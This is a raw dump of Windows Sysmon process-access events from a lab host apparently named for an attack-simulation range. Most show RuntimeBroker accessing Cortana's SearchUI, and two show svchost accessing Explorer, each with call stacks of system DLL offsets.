12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246096C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246096C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49244776C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.onecore.dll+1602f|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000007287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:33.798{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\ncbservice.dll+86ee|c:\windows\system32\ncbservice.dll+6753|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.798{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+86c0|c:\windows\system32\ncbservice.dll+6753|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
